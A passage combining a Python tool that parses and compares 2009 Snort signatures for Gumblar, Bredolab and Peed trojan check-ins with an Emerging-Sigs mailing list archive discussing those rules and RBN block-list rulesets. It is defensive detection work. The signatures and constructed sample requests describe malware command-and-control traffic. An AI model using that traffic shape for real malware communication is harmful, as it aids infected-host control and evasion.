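    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Gumblar checkin"; content:"GET "; depth:4; uricontent:"controller.php"; uricontent:"action=bot"; uricontent:"&entity_list="; uricontent:"&uid="; uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd="; classtype:trojan-activity; reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)',
    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Gumblar check in type request"; content:"GET "; depth:4; uricontent:"v="; uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; uricontent:"&q="; content:"User-Agent\\:|0d 0a|"; classtype:trojan-activity; reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/; sid:; rev:1;)',
    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab Downloader Communicating With Controller (1)"; flow:established,to_server; uricontent:"action="; nocase; uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B; sid:2009353; rev:1;)',
    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Peed Report to Controller"; flow:established,to_server; uricontent:"/controller.php?action="; uricontent:"&entity"; uricontent:"&rnd="; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008501; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Peed; sid:2008501; rev:2;)',
]

# name, optional ":value" (quoted or bare), terminating ';'
OPTION_RE = re.compile(r'(\w+)(?:\s*:\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


@dataclass
class Term:
    kind: str                 # "content" (raw payload) or "uricontent" (request URI)
    value: str
    nocase: bool = False
    depth: Optional[int] = None


@dataclass
class Rule:
    msg: str
    sid: str
    terms: List[Term] = field(default_factory=list)


def decode(value: str) -> str:
    """Snort content text: |hex| runs become bytes, backslash escapes lose the backslash."""
    out = []
    for i, part in enumerate(value.split("|")):
        out.append(bytes.fromhex(part).decode("latin-1") if i % 2 else re.sub(r"\\(.)", r"\1", part))
    return "".join(out)


def parse_rule(text: str) -> Rule:
    body = text[text.index("(") + 1 : text.rindex(")")]
    rule = Rule(msg="", sid="")
    for name, value in OPTION_RE.findall(body):
        if value.startswith('"'):
            value = value[1:-1]
        if name in ("content", "uricontent"):
            rule.terms.append(Term(name, decode(value)))
        elif name == "nocase":          # modifiers apply to the preceding content
            rule.terms[-1].nocase = True
        elif name == "depth":
            rule.terms[-1].depth = int(value)
        elif name == "msg":
            rule.msg = value
        elif name == "sid":
            rule.sid = value
    return rule


def uri_terms(rule: Rule) -> List[Term]:
    return [t for t in rule.terms if t.kind == "uricontent"]


def covers(a: Term, b: Term) -> bool:
    """True if every URI that satisfies term b also satisfies term a."""
    if b.nocase and not a.nocase:
        return False                    # b also fires on case variants a would miss
    return a.value.lower() in b.value.lower() if a.nocase else a.value in b.value


def subsumes(a: Rule, b: Rule) -> bool:
    """Every uricontent of a sits inside some uricontent of b, so b can only fire when a does.
    Strings are compared one at a time: two short terms of b never combine to cover one of a's."""
    return all(any(covers(ta, tb) for tb in uri_terms(b)) for ta in uri_terms(a))


def matches(rule: Rule, request: str) -> bool:
    """Approximate evaluation: uricontent against the request-line URI, content against the
    raw request, depth restricting the search to the first N bytes."""
    pieces = request.split("\r\n", 1)[0].split(" ")
    uri = pieces[1] if len(pieces) > 1 else ""
    for t in rule.terms:
        hay = uri if t.kind == "uricontent" else request
        if t.depth is not None:
            hay = hay[: t.depth]
        if not (t.value.lower() in hay.lower() if t.nocase else t.value in hay):
            return False
    return True


# Constructed requests shaped like the check-ins in the martinsecurity write-up; not captures.
REQ_BOT = ("GET /controller.php?action=bot&entity_list=1&uid=2&first=1&guid=abc&rnd=123 HTTP/1.1\r\n"
           "Host: example.invalid\r\nUser-Agent:\r\n\r\n")
REQ_TYPE = "GET /x.php?v=1&s=abc&uid=2&p=3&q=4 HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent:\r\n\r\n"


def report(rules: Sequence[str], requests: Sequence[str]):
    """Return (list of (broader msg, narrower msg) pairs, {msg: indices of matching requests})."""
    parsed = [parse_rule(r) for r in rules]
    overlaps = [(a.msg, b.msg) for a in parsed for b in parsed if a is not b and subsumes(a, b)]
    hits = {r.msg: [i for i, req in enumerate(requests) if matches(r, req)] for r in parsed}
    return overlaps, hits


if __name__ == "__main__":
    found, fired = report(RULES, [REQ_BOT, REQ_TYPE])
    for broad, narrow in found:
        print(f"{narrow!r} cannot fire without {broad!r}")
    for msg, idx in fired.items():
        print(f"{msg}: requests {idx}")
```

The string-at-a-time comparison flags the Bredolab rule as covering the Gumblar check-in rule but says nothing about the Peed rule, whose single `/controller.php?action=` term is split across two of Jaime's; both still fire on the same constructed request, which is what `matches` is for. On the second Gumblar rule, `v=` and `&s=` are short enough to occur in ordinary query strings, so the empty `User-Agent:` header is carrying most of the specificity.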
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090527/459c86e0/attachment.html From jjohnson at jdmc.org Wed May 27 11:22:13 2009 From: jjohnson at jdmc.org (John Johnson) Date: Wed, 27 May 2009 10:22:13 -0500 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: References: <4A131D81.3040907@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> <4A1C8C0B.2090408@windstream.net> Message-ID: <4A1D5AA5.3080200@jdmc.org> Martin Holste wrote: > Let me put it this way: when you've got a hammer, everything looks like a nail. > > And when you magically turn other people's hammers into saw's, they can no longer hammer. However, if I know whats coming in advance, I'm sure a little local perl can generate an external set of rules from an internal views set. john From jonkman at jonkmans.com Wed May 27 11:48:19 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 27 May 2009 11:48:19 -0400 Subject: [Emerging-Sigs] Gumblar Activity In-Reply-To: <53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com> References: <53834cf20905270759s44540bb2u7d56a35d0444354f@mail.gmail.com> <1243437107.7039.8.camel@kinta> <53834cf20905270814u2772e085o2b44a588e4ee87a8@mail.gmail.com> Message-ID: <4A1D60C3.7000006@jonkmans.com> Got it, thanks Jaime! 
Matt Jaime Blasco wrote: > Yeah, we can use the second one: > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE > Gumblar check in type request"; content:"GET "; depth:4; > uricontent:"v="; uricontent:"&s="; uricontent:"&uid="; uricontent:"&p="; > uricontent:"&q="; content:"User-Agent\:|0d 0a|"; > classtype:trojan-activity; > reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/ > ; > sid:; rev:1;) > > to have more c&c traffic coverage. > > Regards > > 2009/5/27 dxp > > > Thre's already one in the set by Darren Spruell: > > */etc/snort/rules/emerging-virus.rules-344*-#by Darren Spruell > > */etc/snort/rules/emerging-virus.rules:345:*alert tcp $HOME_NET > any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Bredolab > Downloader Communicating With Controller (1)"; > flow:established,to_server; uricontent:"action="; nocase; > uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase; > uricontent:"&first="; uricontent:"&guid="; nocase; > uricontent:"&rnd="; nocase; classtype:trojan-activity; > reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=TrojanDownloader:Win32/Bredolab.B > ; > sid:2009353; rev:1;) > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > > On Wed, 2009-05-27 at 16:59 +0200, Jaime Blasco wrote: >> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET >> MALWARE Gumblar checkin"; content:"GET "; depth:4; >> uricontent:"controller.php"; uricontent:"action=bot"; >> uricontent:"&entity_list="; uricontent:"&uid="; >> uricontent:"&first="; uricontent:"&guid="; uricontent:"&rnd="; >> classtype:trojan-activity; >> reference:url,www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/ >> ; >> sid:; rev:1;) > > > > > -- > _______________________________ > > Jaime Blasco > > www.ossim.com > www.alienvault.com > Email: jaime.blasco at alienvault.com > > > 
------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed May 27 11:56:27 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 27 May 2009 11:56:27 -0400 Subject: [Emerging-Sigs] Programmers and an Update Message-ID: <4A1D62AB.9020006@jonkmans.com> We're grateful for all the applications to date for the coding and project management positions at the OISF. We have the PM slot filled and many programmers. We're making the final programmer hiring decisions for the initial team next week, so please send a resume if you haven't yet and are interested. Again this will be remote contract work at a good rate, part time to full time. Thanks all! We're just about to really get rolling! 
Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From eoin.miller at trojanedbinaries.com Wed May 27 12:06:39 2009 From: eoin.miller at trojanedbinaries.com (Eoin Miller) Date: Wed, 27 May 2009 12:06:39 -0400 Subject: [Emerging-Sigs] IP List rulesets In-Reply-To: <4A1C8C0B.2090408@windstream.net> References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> <4A1C8C0B.2090408@windstream.net> Message-ID: <4A1D650F.9040100@trojanedbinaries.com> I think the difference actually lies in the implementation at differing sites. Upon further review, the rbn-BLOCK rules are the way that appears to help our situation most. However, we are not running inline or have SnortSam configured at our site so I mistakenly ignored the contents of the rbn-BLOCK rules. We still have to modify rbn-BLOCK to get rid of the fwsam portion of the rule prior to use for our implementation. Creating an incoming and outgoing ruleset is helpful for those who do not use Snort in an IPS fashion. It is not always feasible at every organization to do so, even if desired. 
--
Eoin Miller

waldo kitty wrote:
> Eoin Miller wrote:
>> Please review the current rbn-rules as they do not alert/block to any outgoing TCP connections to the RBN:
>
> been there, done that ;)
>
> my understanding in this set of RBN oriented threads is that some have proposed sets of rules for both, internally looking and externally looking sensors...
>
> [trim of example rule]
>
>> Short of doubling the rules (one for incoming and the other for outgoing) adding the SA flag, instead of just the S flag, tracks who is reaching out instead of just who is reaching in.
>
> this doubling has been proposed...
>
>> Clients are not infected by RBN reaching in, they are infected by reaching out to malicious sites. Once infected, they reach out again.
>
> right... but my/our concern is not just for clients reaching out but also of RBN sites "cold calling" and trying to force their way into possibly insecure servers ;)
>
>> The above rule stops reaching IN from RBN, but does nothing to stop an infected machine from reaching out nor does it stop a clean machine from reaching OUT to a drive by site.
>
> understood... maybe i'm getting lost in what the actual proposal(s) are looking to tag? the existing rules have allowed us to block any and all accesses from RBN machines on the outside... "doubling up on the rules" would also allow us to determine which internal machines are reaching out ;)
>
> some networks have internally facing sensors while others have externally facing ones... then there are those that have internal and external watchers ;)
>
>> --
>> Eoin Miller
>>
>> waldo kitty wrote:
>>> Eoin Miller wrote:
>>>> only catches connections coming inbound from the RBN network and you are generally more concerned with people reaching out to the RBN as they are downloading malware/joining botnets from behind your NAT'd firewalls.
>>> yes and no...
>>> we do not want /any/ access attempts to our network allowed... from inside or "cold calling" probes from outside... we see where a two layered approach is a GoodThing... the first layer being to monitor for any access attempts to our network from any/all RBN networks... the second, being the notices about internal machine trying to make contact with RBN networks... this second one seen mainly as a good way to track down the infested machine(s) for cleaning... especially since the RBN networks are already blocked by the first ;)
>

From jonkman at jonkmans.com Wed May 27 12:33:11 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 27 May 2009 12:33:11 -0400
Subject: [Emerging-Sigs] IP List rulesets -- Possible Solution
In-Reply-To: <4A1D5AA5.3080200@jdmc.org>
References: <4A131D81.3040907@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> <4A1C8C0B.2090408@windstream.net> <4A1D5AA5.3080200@jdmc.org>
Message-ID: <4A1D6B47.30509@jonkmans.com>

Thanks everyone for all of the opinions on this. There's no way we're going to do it exactly as it is desired for all involved here. So here's my train of thought:

We could publish an incoming and outgoing ruleset. Run the one you prefer, or both.

We could go with the bi-directional indicator but that makes automated blocking a problem, won't know who the attacker is.

I agree that the internal hosts reaching out to the outside is likely more of a threat than the inbound scanning. An internal host reaching out is a relatively good sign of an infection already in place. But in a web farm it's all inbound attacks...

So I propose:

1. Changing the existing RBN ruleset to HOME_NET -> RBN_Hosts
2. Renaming that ruleset file to emerging-rbn-outgoing.rules (and the -BLOCK.rules file)
3. Create a new ruleset named emerging-rbn-incoming.rules (and the -BLOCK.rules file) with a new sid range of 2408000-2408999

Notes:
No changes to the tor ruleset as these are all inbound related
No change to the bot-cc ruleset as these are all outbound related
No change to the dshield attackers rulesets as these are inbound related
No change to the compromised list now, but we ought to consider it. These could be CnC's or scanners...

This lets us run inbound and outbound where appropriate. Personally I'll be running the inbound rules on my server farms and dns nets, and the outbound on client nets. Possibly both in some places. But we're still I believe getting the performance gains.

Anyone see an issue with going here? If no objections I'll set this up to go into effect Friday of this week.

Matt

John Johnson wrote:
> Martin Holste wrote:
>> Let me put it this way: when you've got a hammer, everything looks like a nail.
>
> And when you magically turn other people's hammers into saws, they can no longer hammer.
>
> However, if I know what's coming in advance, I'm sure a little local perl can generate an external set of rules from an internal views set.
>
> john

From mcholste at gmail.com Wed May 27 12:37:26 2009
From: mcholste at gmail.com (Martin Holste)
Date: Wed, 27 May 2009 11:37:26 -0500
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1D650F.9040100@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com> <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com> <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com> <4A1C62F5.8030100@windstream.net> <4A1C75A4.9070106@trojanedbinaries.com> <4A1C8C0B.2090408@windstream.net> <4A1D650F.9040100@trojanedbinaries.com>
Message-ID:

Those are good points from both you and John. I was trying to encourage everyone to consider alternative methods of accomplishing their goals and to say that in my experience, a half hour of reading up on a different program can be worth much more than a half hour of trying to shoehorn a program I'm familiar with to work the way I want it to. I think that Sourcefire's RNA product indicates that Snort is not designed to do heavy flow recording/alerting in anything larger than a small branch office, though Snort certainly can try if you force it to. But the half hour I spent reading about and installing NFSen (nfsen.sourceforge.net) was much more productive for me than writing more Perl to fuss with the ET ruleset.
Heh, actually when I think about it though, one of the first things I did with NFSen was to write a Perl script to convert the emerging-botcc list into a straight IP list for an NFSen filter. That's because I populate NFSen's alert filters with many IP blacklists which I amalgamate. If you think that sounds ridiculous, I encourage you to check out the thorough and extensible front-end capabilities of NFSen for flow querying, reporting, and alerting to see why it would be worth setting up, and where your Perl-fu might be better spent for flows.

Anyway, I'm not trying to sell you on something you don't want to buy, but I thought mentioning an alternative solution might help out some of you at medium-to-large organizations.

--Martin

On Wed, May 27, 2009 at 11:06 AM, Eoin Miller <eoin.miller at trojanedbinaries.com> wrote:
> I think the difference actually lies in the implementation at differing sites. Upon further review, the rbn-BLOCK rules are the way that appears to help our situation most. However, we are not running inline or have SnortSam configured at our site so I mistakenly ignored the contents of the rbn-BLOCK rules. We still have to modify rbn-BLOCK to get rid of the fwsam portion of the rule prior to use for our implementation.
>
> Creating an incoming and outgoing ruleset is helpful for those who do not use Snort in an IPS fashion. It is not always feasible at every organization to do so, even if desired.
>
> --
> Eoin Miller
>
> waldo kitty wrote:
> > Eoin Miller wrote:
> >> Please review the current rbn-rules as they do not alert/block to any outgoing TCP connections to the RBN:
> >
> > been there, done that ;)
> >
> > my understanding in this set of RBN oriented threads is that some have proposed sets of rules for both, internally looking and externally looking sensors...
> >
> > [trim of example rule]
> >
> >> Short of doubling the rules (one for incoming and the other for outgoing) adding the SA flag, instead of just the S flag, tracks who is reaching out instead of just who is reaching in.
> >
> > this doubling has been proposed...
> >
> >> Clients are not infected by RBN reaching in, they are infected by reaching out